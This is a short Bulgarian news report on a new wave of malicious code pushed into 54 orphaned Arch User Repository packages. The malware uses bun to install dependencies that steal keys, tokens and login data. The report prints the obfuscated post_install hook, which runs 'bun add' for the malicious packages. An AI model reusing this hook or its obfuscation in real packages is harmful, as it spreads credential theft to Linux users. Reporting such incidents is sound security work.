Въпреки предприетите мерки от разработчиците на Arch Linux, активността по внедряване на злонамерен код в репозиториите на AUR (Arch User Repository) не е спряна. Преди няколко часа злонамерен код беше добавен в още 54 пакета, останали без поддръжка (история на анулиране на злонамерените редакции). За разлика от нападението преди два дни, вместо пакетния мениджър npm, този път беше използвана платформата bun за инсталиране на злонамерени зависимости. За да се заобиколят реализираните филтри, в функцията post_install се вмъква обфускиран низ, в който се извиква командата „bun add“ за инсталиране на пакети със злонамерен код, който извършва сканиране и изпраща данни на външни сървър ключове, токени и данни за вход.
post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»»f»‘i»l»e»-»j»s’
}
Източник: opennet.ru
